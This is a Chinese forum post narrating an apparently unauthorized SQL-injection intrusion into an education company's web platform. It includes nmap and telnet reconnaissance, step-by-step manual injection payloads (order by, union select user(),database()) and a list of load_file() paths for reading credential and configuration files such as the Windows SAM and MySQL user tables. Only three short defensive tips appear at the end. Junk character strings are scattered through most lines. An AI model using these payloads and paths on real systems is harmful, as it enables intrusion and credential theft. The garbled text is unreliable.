找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2084|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:0 C9 q- |( l. e9 x* c4 D# i/ h
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……6 r8 A' J/ X; H+ O
第一步:获取需要的信息
% i' i% H- a0 |; O# K  f由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
, b  X6 a( w, y# A- \% O注:以下为保护特用XXX代替敏感信息
/ [) o: j" _' P+ j# C6 q顺手先PING了一下他们的域名:4 n6 E7 @# v2 ~, [
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)/ U5 p5 B9 M- V! T
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
* |  c2 Q+ e( e顺便了解一下TTL,学好基础知识才能一路顺风:
+ r+ R8 ]* e0 uTTL:(Time To Live ) 生存时间0 Z( J% E& F6 x2 ^/ \  F$ R0 h" N! v
指定数据包被路由器丢弃之前允许通过的网段数量。% p$ c9 y! t# R- {" V3 B  Z* |
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。% m$ G, u( ^3 j  R. I
使用PING时涉及到的 ICMP 报文类型
& k; q# H7 b. b' k一个为ICMP请求回显(ICMP Echo Request)
# R9 ^7 s- F/ K% V9 b7 X一个为ICMP回显应答(ICMP Echo Reply)( W2 f9 f% \4 Y$ X! d
TTL 字段值可以帮助我们识别操作系统类型。
$ Q8 M2 ^( \# Y& yUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
) I3 l" [3 N/ `4 t! [; S) FCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
0 D5 `. {9 C: t微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
* V- x* H% b# R" W# `; z& ]. [微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 325 B" A- Y3 c# `
当然,返回的TTL值是相同的
' l8 `( k8 I; Z% K但有些情况下有所特殊
2 K3 M& T& V% U9 fLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64* \* k% B2 ]  N
FreeBSD 4.1, 4.0, 3.4;' ?, u: `* p# _/ ?" _# p
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
) Q+ o) k1 N  c( tOpenBSD 2.6, 2.7,$ c0 |' r7 J9 k7 u7 m- p, j/ X. h) P
NetBSD$ H& K+ W$ i7 X& ]4 Z9 L/ t
HP UX 10.20
9 P* x9 V" D: [2 NICMP 回显应答的 TTL 字段值为 2556 I, C, Y( F; _; T" o! Z
Windows 95/98/98SE
4 {% A! J/ M6 x8 @0 Z  [Windows ME7 X% _* M$ X( R. W8 o; F* N+ w
ICMP 回显应答的 TTL 字段值为 32
4 Q) h7 l# N" a" [: ?( `7 zWindows NT4 WRKS0 Q4 i: L& L( |5 ^* r: \
Windows NT4 Server) H( q( ~. j  O8 H% H
Windows 2000
5 C$ c3 d: \3 q  X& DWindows XP4 D: W( [9 o2 x; S3 k! |- y
ICMP 回显应答的 TTL 字段值为 128. v: \8 L. s2 O9 \
这样,我们就可以通过这种方法来辨别操作系统
+ Y- ?7 @1 m" w8 z) g0 ]8 a& eTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255* |8 K: ~/ V% v# Z  t; B
用NMAP扫描一下:6 N9 ]4 w" _4 z% V6 L3 S
nmap -sT -O XXX.XXX.XXX.XXX/ ~3 t: E# Q7 i8 l) _  q
如果没有装WinPcap则会弹出提示:
, [7 f+ m8 o" L, NWARNING: Could not import all necessary WinPcap functions.  You may need to upgr
4 W# \) X& h1 f0 eade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
& b2 f9 R! N* I( a; Y) X; b) mode — Nmap may not function completely
! U4 a- s+ H) [8 N( ^TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
( H9 V+ S9 S/ _! V! A0 |and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
% S" A% S0 W( _" {* kpcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
' i! d5 {/ e% x# K: Q3 F# Xd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v0 v5 e# v, P0 {
ersions, you may be able to take iphlpapi.dll from another system and place it i
3 J1 {0 m& A6 ~n your system32 dir (e.g. c:\windows\system32).
- {; f, P# W- uQUITTING!  X1 ~) a- H# l- U
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe3 s4 c3 H% q' a; U( q% O$ C7 w
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
+ B5 ~& j9 H: f0 qInteresting ports on XXX.XXX.XXX.XXX:
; V+ }- E' m- M1 k. x! Q! V8 N9 KNot shown: 986 closed ports& b" p4 c  e4 l8 u" ?, L) s
PORT     STATE    SERVICE# Y4 Y# E# M" s* ^6 O
21/tcp   open     ftp" z; A$ H+ N, R* w! k6 v
22/tcp   open     ssh# u) x% ^  l. ^* [
23/tcp   open     telnet( I  x4 M2 E# U/ J
80/tcp   open     http
% l: g5 J# G  C! b9 O' I111/tcp  open     rpcbind. Y8 }% P/ `% F/ O
135/tcp  filtered msrpc
3 I' Y6 i3 t- G( l2 `5 H139/tcp  filtered netbios-ssn
. b3 F) X2 \9 `. A. }& |" {445/tcp  filtered microsoft-ds
& k" o1 N4 c7 I! i5 m' M, N' n513/tcp  open     login
5 b% [8 p2 G1 n3 G4 ^1 M3 }7 y514/tcp  open     shell
0 [/ y, c3 T0 o9 u  E# M4 h( u" U593/tcp  filtered http-rpc-epmap
! v( c" c& J# A3 B" f# C1720/tcp filtered H.323/Q.931* B0 S; j, Y3 `$ x; V# s
3306/tcp open     mysql% ], M" k) F9 u7 r2 Q* l9 f! J- Y
4444/tcp filtered krb524
  _! }& y# ~/ f# H9 uDevice type: WAP
& U5 u  T) j$ [  D( k1 _5 u9 n& D% nRunning: Linux 2.4.X
% n2 [5 v. w! h/ U8 F8 r9 N0 B, sOS details: DD-WRT (Linux 2.4.35s)
- C+ N- D* i) G( N% A2 e' [Network Distance: 13 hops
+ j) ^; j9 Q; w0 Y2 [/ u1 E* n看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
0 M5 ^0 S+ s: K& B& j; g. ~login as:" w7 |& L$ |: m
Telnet23端口也是开着的,用telnet 命令链接一下:( [$ h& g% K* a6 y* U! z8 H
telnet XXX.XXX.XXX.XXX# n. f4 O; H! J3 C' a! u0 A7 }
提示:
. f# m9 N% L" y( N8 KRed Hat Enterprise Linux Server release 5.2 (Tikanga)
( R% m- n5 P; u. q6 o' f/ NKernel 2.6.18-92.el5PAE on an i686* }" ^, Y9 V$ [, m  l- L0 z' N" i
login:
/ J$ |9 I2 Q( V3 A: B, w获取HTTP头信息:
( w( K8 z$ M+ H0 A2 ~在本地执行如下PHP代码! O! V- K9 Y: N0 [5 ~# n
<?php
* ?; S" D+ i0 l* Z/ f$url = ‘XXX.XXX.XXX.XXX’;
6 S/ B4 i, F3 J/ k8 z2 v5 D8 ~print_r(get_headers($url));* K6 }6 l+ @+ f2 P9 @
print_r(get_headers($url, 1));# _2 p4 ]4 S) a3 Z4 X0 a+ X
?>6 h8 J$ x2 i1 s" A
将以上代码保存为PHP文件,执行:
6 F8 g/ X# K% v/ k( m6 l! k# fArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
8 `8 ?+ ~5 m- R现在可以得出结论:
4 o/ B7 f9 f7 f8 s6 E7 e系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)8 R/ v  g) j& @7 T5 ~
内核版本:Kernel 2.6.18-92.el5PAE on an i6869 [" N- o; [& Z9 c
WEB服务器版本:nginx/0.7.61* U; D" E/ _' m: ^0 A8 p
第二步,开始测试寻找漏洞9 G; c4 G8 @" s2 Q* e7 ]9 b* _
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。  M0 b' [# l' ~5 j6 k
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的3 w5 U# N1 p3 |* J, v
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试: d- N6 j0 n- w
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
# T8 H' Y% _. d/ W+ Thttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误# Z; b0 Z2 Y4 N5 m6 w( ]5 r
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
  T$ d4 t* f& t- U0 H3、手工注入:* i$ ~' `3 }, a# r
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
$ O5 Z3 u) t9 O: A& R/ y8 O3.1 猜测当前表字段数
/ i% O3 ^; \- h: m  {http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10' ^+ R) v* g/ i0 L" g+ _
此处猜测有个简单的算法,都是有技巧的吗,呵呵8 P1 a/ T6 }- J! d' ]) y
算法简单如下:
' P3 w: g; c7 @# Z0 v: z- S7 \第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;+ Y& o; R* o; W' {6 T
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;: {1 y9 E+ h2 e4 _+ D* R1 r
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
! ~( ?+ I3 _( G" b以此来判断,是否过界,配合取中算法猜出字段数。
1 L1 I. q' L; I( X举例:
/ O7 w5 v, K  k' y: \http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
0 L. H: @1 y3 ?6 jhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误3 y- h' A& @$ L$ Z+ X. K8 ]  c
此时3则为我们要找的字段数。
* I# H' W- c! l7 {" `6 w; y& c  u3.2 配合union联合查询字段在页面所位置6 A! j: `/ b; E
我们已经知道了字段数为3,此时则可以做如下操作:3 P4 @) X3 \$ H3 q9 f
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
& ?. Z+ h/ I/ Y, y4 M
- C; Z. F( `9 @0 N- ?* M这样就可以测试到哪些字段在页面上有所显示了,如图:  g5 @! Q7 A" T2 f3 W9 c# m
! E0 a' h/ t$ G1 a
3.3 查敏感信息
) L- F0 I8 m& q( o! Q这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。2 d% m+ U! u0 f: @
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
/ [4 [3 o$ {5 z# Q  \* u3.3.1 先查数据库用户、数据库名,以备后用,如图:  j* q; d' H& G( U! r

- X% L8 C( _6 @) d$ Y得到数据库用户为root、数据库名为DBxx;5 q& c4 Q. v+ O) m* F, [
3.3.2 查配置文件
0 u9 ~0 b, v+ L- F查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
& F& I" U' x5 e7 N6 P, t/ |2 w, g' B查看文件有一定的条件限制:
3 _; Z& m. S) E$ T4 a1 W2 V8 s欲读取文件必须在服务器上
, C7 q  I; p% Z! k; L1 w必须指定文件完整的路径+ o- v) P5 \" \1 e7 i% [
必须有权限读取并且文件必须完全可读! E+ N. K, _5 F: [6 H
欲读取文件必须小于 max_allowed_packet
& {& G6 r7 a! N6 m; K* GMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
7 a7 p3 x8 q3 Q* C" D常用的一些:
/ N9 V! t9 O6 I/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
  G$ R- `( [1 z" v6 O6 T/usr/local/apache2/conf/httpd.conf1 @" c) Q  A, l  @5 L
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置1 l  j; y! M3 i! [, i5 M) h
/usr/local/app/php5/lib/php.ini //PHP相关设置
* z4 [: F+ x* f; v6 w/etc/sysconfig/iptables //从中得到防火墙规则策略
8 R' ]- J+ o2 L( c' Z/etc/httpd/conf/httpd.conf // apache配置文件
' X% f/ {" D, @% R7 Y/etc/rsyncd.conf //同步程序配置文件
& u) f- T" p2 c' J/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.( O( n6 y, ]- L6 W0 W; g' l$ D
/etc/my.cnf //mysql的配置文件
0 A# [; d  Y* @/etc/redhat-release //系统版本3 O* g. B2 {' Y2 b4 n# r
/etc/issue
) {" Y6 E( V. _, E$ L/etc/issue.net
* l& e: |! o" ^c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码% B0 ?' j' {' a# L
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码* v: }" D& T0 r8 w: F4 G
c:\Program Files\Serv-U\ServUDaemon.ini
* w4 r# q" A$ Q( jc:\windows\my.ini //MYSQL配置文件
3 _7 s5 m8 u& f! c( F5 e; j: Uc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
, @8 Z8 @7 X3 `( z! @$ W6 f等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
7 P  a( g" l7 Q! f. O2 hc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码8 ?6 R7 h( W- w: Z1 C" z
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此+ O. \; G3 N( f$ z% ~
c:\Program Files\RhinoSoft.com\ServUDaemon.exe0 z4 f; b# ]9 ?* P( P! C
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
) j# y/ X6 c/ H: J* @//存储了pcAnywhere的登陆密码
; N- @; B% E! P6 X  x8 M由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。5 p8 t+ i9 z4 f& T- f% Q
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。3 ]2 }2 p" ~1 ^2 i9 Z
最后:防范措施
* m. k% |9 Z3 v$ V7 ^, K  U' M1、修复PHP注入漏洞;+ y3 ]6 _- O; n; ]: ^; z9 v& K
2、Mysql使用普通权限的用户;/ c+ }* G" ?0 K0 A% \; `) n9 }
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表